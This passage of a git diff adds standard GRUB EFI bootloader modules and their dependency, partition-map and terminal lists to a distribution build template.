b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix2_be.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix3.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix3.mod new file mode 100644 index 00000000..4bd937f7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix3.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix3_be.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix3_be.mod new file mode 100644 index 00000000..1d48e2e9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix3_be.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix_be.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix_be.mod new file mode 100644 index 00000000..7b6ecd69 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix_be.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mmap.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mmap.mod new file mode 100644 index 00000000..aa7cad46 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mmap.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/moddep.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/moddep.lst new file mode 100644 index 00000000..093b1a61 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/moddep.lst @@ -0,0 +1,257 @@ +squash4: xzio gzio lzopio fshelp +search_fs_uuid: +lssal: +legacycfg: gcry_md5 crypto password normal +date: datetime normal +bfs: fshelp +uhci: usb +multiboot2: boot video net acpi relocator mmap +gcry_twofish: crypto +cpio_be: archelp +priority_queue: +gcry_rijndael: crypto +echo: extcmd +cpio: archelp +xzio: crypto +part_sun: +hfspluscomp: gzio hfsplus +gcry_sha512: crypto +gcry_cast5: crypto +efi_gop: video video_fb +ctz_test: functional_test +boot: +setjmp_test: setjmp functional_test +odc: archelp +ls: extcmd normal +gzio: +cbmemc: cbtable terminfo normal +video: +test_blockarg: extcmd normal +linuxefi: boot +gfxterm: video font +cbtable: +mul_test: functional_test +gcry_tiger: crypto +gcry_serpent: crypto +aout: +macbless: disk +gcry_blowfish: crypto +appleldr: boot +trig: +extcmd: +at_keyboard: boot keylayouts +videoinfo: video +testspeed: extcmd normal +minix: +keylayouts: +xnu_uuid: gcry_md5 +usbtest: usb +usbms: usb scsi +reboot: +morse: +help: extcmd normal +part_msdos: +http: net +gcry_rsa: mpi verify +cbtime: cbtable +blocklist: +probe: extcmd +pbkdf2: crypto +lsefisystab: +gcry_rfc2268: crypto +ufs1_be: +nativedisk: +gcry_camellia: crypto +fat: fshelp +exfctest: functional_test +parttool: normal +lzopio: crypto +linux: boot video relocator mmap +gcry_md4: crypto +zfsinfo: zfs +usb_keyboard: keylayouts usb +gcry_md5: crypto +fshelp: +ehci: boot usb cs5536 +datetime: +bitmap_scale: bitmap +ata: scsi +usbserial_common: usb serial +syslinuxcfg: extcmd normal +net: priority_queue boot datetime bufio +gcry_des: crypto +div_test: div functional_test +time: +reiserfs: fshelp +dm_nv: diskfilter +datehook: datetime normal +mdraid09_be: diskfilter +cmp_test: functional_test +backtrace: +ahci: boot ata +kernel: +video_cirrus: video video_fb +part_plan: +gcry_seed: crypto +minix_be: +crypto: +video_colors: +test: +terminal: +part_dvh: +lsacpi: extcmd acpi +jpeg: bufio bitmap +bsd: boot video aout extcmd gcry_md5 crypto cpuid elf relocator serial mmap +memdisk: +gfxmenu: video gfxterm trig bitmap_scale video_colors bitmap normal font +cmp: +acpi: extcmd mmap +xfs: fshelp +elf: +div: +cpuid: extcmd +affs: fshelp +usb: +videotest: video gfxmenu font +tr: extcmd +testload: +relocator: mmap +play: +gfxterm_menu: video_fb functional_test procfs normal font +cbfs: archelp +adler32: crypto +progress: normal +password: crypto normal +part_sunpc: +video_fb: +tftp: priority_queue net +sleep: extcmd normal +serial: extcmd terminfo +search_fs_file: +gcry_sha256: crypto +gcry_rmd160: crypto +exfat: fshelp +search: search_fs_uuid extcmd search_fs_file search_label +mdraid09: diskfilter +chain: boot net efinet +mpi: crypto +memrw: extcmd +cs5536: +password_pbkdf2: gcry_sha512 pbkdf2 crypto normal +mdraid1x: diskfilter +linux16: boot video relocator mmap +gcry_crc: crypto +configfile: normal +zfscrypt: gcry_rijndael extcmd pbkdf2 crypto zfs gcry_sha1 +signature_test: functional_test procfs +raid5rec: diskfilter +pcidump: extcmd +gcry_arcfour: crypto +part_dfly: +minix2_be: +gettext: +pbkdf2_test: pbkdf2 gcry_sha1 functional_test +hello: extcmd +usbserial_pl2303: usbserial_common usb serial +hashsum: extcmd crypto normal +xnu_uuid_test: functional_test +regexp: extcmd normal +part_gpt: +ohci: boot usb cs5536 +gptsync: disk +zfs: gzio +part_apple: +hdparm: extcmd +bufio: +btrfs: gzio lzopio +bitmap: +true: +terminfo: extcmd +romfs: fshelp +ntfscomp: ntfs +lsefi: +hfs: fshelp +gcry_dsa: mpi verify +cmdline_cat_test: video_fb functional_test procfs normal font +ufs1: +offsetio: +legacy_password_test: legacycfg functional_test +setjmp: +ufs2: +nilfs2: fshelp +lsmmap: mmap +gcry_sha1: crypto +mmap: +tar: archelp +png: bufio bitmap +lspci: extcmd +hfsplus: fshelp +cbls: cbtable +tga: bufio bitmap +random: hexdump +minix2: +setpci: extcmd +scsi: +pata: ata +minix3: +lvm: diskfilter +functional_test: video extcmd video_fb btrfs +eval: normal +iso9660: fshelp +crc64: crypto +udf: fshelp +search_label: +raid6rec: diskfilter +msdospart: parttool disk +archelp: +procfs: archelp +minix3_be: +halt: acpi +xnu: boot video extcmd bitmap_scale relocator bitmap mmap random macho +read: +multiboot: boot video net relocator mmap +keystatus: extcmd +cryptodisk: extcmd crypto procfs +shift_test: functional_test +normal: boot extcmd crypto terminal gettext bufio +lsefimmap: +loadbios: +geli: gcry_sha512 pbkdf2 crypto gcry_sha256 cryptodisk +spkmodem: terminfo +gcry_idea: crypto +bswap_test: functional_test +video_bochs: video video_fb +verify: extcmd crypto mpi gcry_sha1 +sfs: fshelp +part_amiga: +luks: pbkdf2 crypto cryptodisk +loopback: extcmd +jfs: +gfxterm_background: gfxterm video extcmd bitmap_scale video_colors bitmap +efifwsetup: reboot +usbserial_usbdebug: usbserial_common usb serial +part_acorn: +newc: archelp +macho: +iorw: extcmd +cat: extcmd +afs: fshelp +sleep_test: datetime functional_test +ldm: part_msdos part_gpt diskfilter +hexdump: extcmd +efinet: net +disk: +usbserial_ftdi: usbserial_common usb serial +minicmd: +loadenv: extcmd disk +gcry_whirlpool: crypto +fixvideo: +part_bsd: part_msdos +font: video bufio +ext2: fshelp +diskfilter: +videotest_checksum: video_fb functional_test font +file: extcmd elf offsetio macho +ntfs: fshelp +efi_uga: video video_fb +all_video: efi_gop efi_uga video_bochs video_cirrus diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/morse.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/morse.mod new file mode 100644 index 00000000..fb2d81e6 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/morse.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mpi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mpi.mod new file mode 100644 index 00000000..01c05f72 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mpi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/msdospart.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/msdospart.mod new file mode 100644 index 00000000..34e49255 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/msdospart.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mul_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mul_test.mod new file mode 100644 index 00000000..c110ab0c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mul_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/multiboot.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/multiboot.mod new file mode 100644 index 00000000..1996d3f4 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/multiboot.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/multiboot2.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/multiboot2.mod new file mode 100644 index 00000000..67e2936c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/multiboot2.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/nativedisk.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/nativedisk.mod new file mode 100644 index 00000000..07c32fc4 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/nativedisk.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/net.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/net.mod new file mode 100644 index 00000000..d4b5c1f2 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/net.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/newc.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/newc.mod new file mode 100644 index 00000000..592f6875 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/newc.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/normal.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/normal.mod new file mode 100644 index 00000000..ed11b01f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/normal.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ntfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ntfs.mod new file mode 100644 index 00000000..a3fa4c66 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ntfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ntfscomp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ntfscomp.mod new file mode 100644 index 00000000..877bf8b7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ntfscomp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/odc.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/odc.mod new file mode 100644 index 00000000..d842cc2a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/odc.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/offsetio.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/offsetio.mod new file mode 100644 index 00000000..338e33ed Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/offsetio.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ohci.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ohci.mod new file mode 100644 index 00000000..3ca97389 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ohci.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_acorn.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_acorn.mod new file mode 100644 index 00000000..86728e6e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_acorn.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_amiga.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_amiga.mod new file mode 100644 index 00000000..33e58302 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_amiga.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_apple.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_apple.mod new file mode 100644 index 00000000..768ae83e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_apple.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_bsd.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_bsd.mod new file mode 100644 index 00000000..9db236cd Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_bsd.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_dfly.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_dfly.mod new file mode 100644 index 00000000..9be813c0 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_dfly.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_dvh.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_dvh.mod new file mode 100644 index 00000000..5e3717b8 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_dvh.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_gpt.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_gpt.mod new file mode 100644 index 00000000..c310512e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_gpt.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_msdos.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_msdos.mod new file mode 100644 index 00000000..7751112b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_msdos.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_plan.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_plan.mod new file mode 100644 index 00000000..40d3d968 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_plan.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_sun.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_sun.mod new file mode 100644 index 00000000..769cb424 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_sun.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_sunpc.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_sunpc.mod new file mode 100644 index 00000000..5355b7f9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/part_sunpc.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/partmap.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/partmap.lst new file mode 100644 index 00000000..761233aa --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/partmap.lst @@ -0,0 +1,11 @@ +part_acorn +part_amiga +part_apple +part_bsd +part_dfly +part_dvh +part_gpt +part_msdos +part_plan +part_sun +part_sunpc diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/parttool.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/parttool.lst new file mode 100644 index 00000000..68b4b5c4 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/parttool.lst @@ -0,0 +1 @@ +msdos: msdospart diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/parttool.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/parttool.mod new file mode 100644 index 00000000..4fc5de4f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/parttool.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/password.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/password.mod new file mode 100644 index 00000000..9a1b890a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/password.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/password_pbkdf2.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/password_pbkdf2.mod new file mode 100644 index 00000000..61b63570 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/password_pbkdf2.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/pata.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/pata.mod new file mode 100644 index 00000000..37a8f3f6 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/pata.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/pbkdf2.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/pbkdf2.mod new file mode 100644 index 00000000..e869b6a7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/pbkdf2.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/pbkdf2_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/pbkdf2_test.mod new file mode 100644 index 00000000..9f120dcc Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/pbkdf2_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/pcidump.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/pcidump.mod new file mode 100644 index 00000000..5ac14124 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/pcidump.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/play.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/play.mod new file mode 100644 index 00000000..2c1e5233 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/play.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/png.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/png.mod new file mode 100644 index 00000000..1da4f6d6 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/png.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/priority_queue.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/priority_queue.mod new file mode 100644 index 00000000..3b81d33c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/priority_queue.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/probe.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/probe.mod new file mode 100644 index 00000000..c0aad07b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/probe.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/procfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/procfs.mod new file mode 100644 index 00000000..ce1865d1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/procfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/progress.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/progress.mod new file mode 100644 index 00000000..a64f20b0 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/progress.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/raid5rec.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/raid5rec.mod new file mode 100644 index 00000000..dba44088 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/raid5rec.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/raid6rec.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/raid6rec.mod new file mode 100644 index 00000000..711ae62f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/raid6rec.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/random.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/random.mod new file mode 100644 index 00000000..61b9e891 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/random.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/read.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/read.mod new file mode 100644 index 00000000..c55b43df Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/read.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/reboot.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/reboot.mod new file mode 100644 index 00000000..c1fe0e6b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/reboot.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/regexp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/regexp.mod new file mode 100644 index 00000000..b2f61f2a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/regexp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/reiserfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/reiserfs.mod new file mode 100644 index 00000000..e266a7ab Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/reiserfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/relocator.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/relocator.mod new file mode 100644 index 00000000..eaee4616 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/relocator.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/romfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/romfs.mod new file mode 100644 index 00000000..936cdc4d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/romfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/scsi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/scsi.mod new file mode 100644 index 00000000..5c6de13c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/scsi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/serial.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/serial.mod new file mode 100644 index 00000000..259ad618 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/serial.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/setjmp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/setjmp.mod new file mode 100644 index 00000000..a0b4e571 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/setjmp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/setjmp_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/setjmp_test.mod new file mode 100644 index 00000000..e6d68dc7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/setjmp_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/setpci.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/setpci.mod new file mode 100644 index 00000000..01bf1894 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/setpci.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/shift_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/shift_test.mod new file mode 100644 index 00000000..e9ffd084 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/shift_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/signature_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/signature_test.mod new file mode 100644 index 00000000..a60fbf67 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/signature_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/sleep.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/sleep.mod new file mode 100644 index 00000000..18fd278b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/sleep.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/sleep_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/sleep_test.mod new file mode 100644 index 00000000..5ba82db5 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/sleep_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/spkmodem.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/spkmodem.mod new file mode 100644 index 00000000..f856a41c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/spkmodem.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/squash4.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/squash4.mod new file mode 100644 index 00000000..f55ca8e9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/squash4.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/syslinuxcfg.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/syslinuxcfg.mod new file mode 100644 index 00000000..d23f6733 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/syslinuxcfg.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/terminal.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/terminal.lst new file mode 100644 index 00000000..3c9a5a34 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/terminal.lst @@ -0,0 +1,9 @@ +iat_keyboard: at_keyboard +iserial: serial +iserial_*: serial +oaudio: morse +ocbmemc: cbmemc +ogfxterm: gfxterm +oserial: serial +oserial_*: serial +ospkmodem: spkmodem diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/terminal.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/terminal.mod new file mode 100644 index 00000000..7f4de6fb Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/terminal.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/terminfo.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/terminfo.mod new file mode 100644 index 00000000..e3e71a7b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/terminfo.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/test.mod new file mode 100644 index 00000000..7add04fd Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/test_blockarg.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/test_blockarg.mod new file mode 100644 index 00000000..0eb1e3e2 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/test_blockarg.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/testload.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/testload.mod new file mode 100644 index 00000000..ec90e098 Binary files /dev/null and 